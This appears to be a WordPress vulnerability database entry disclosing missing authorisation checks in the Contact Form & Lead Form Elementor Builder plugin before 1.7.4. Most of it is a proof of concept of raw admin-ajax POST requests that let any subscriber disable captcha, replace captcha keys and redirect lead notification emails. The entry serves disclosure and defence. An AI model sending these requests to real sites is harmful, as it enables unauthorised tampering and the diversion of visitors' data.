WordPress Plugin Vulnerabilities
Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update
Description
The plugin doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings
Proof of Concept
PoC POST Request (ON/OFF Captcha): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption PoC POST Request (Captcha Settings: Site Key & Secret Key): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings PoC POST Request (Lead Receiving Method): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings PoC POST Request (User Email Notifications): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings PoC POST Request (Admin Email Notifications): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings PoC POST Request (Remember this Form): POST /wp-admin/admin-ajax.php HTTP/2 Cookie: [any authenticated user] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest form_id=1&action=RememberMeThisForm
Affects Plugins
References
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Yoru Oni
Submitter
Yoru Oni
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-01 (about 2 years ago)
Added
2022-02-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)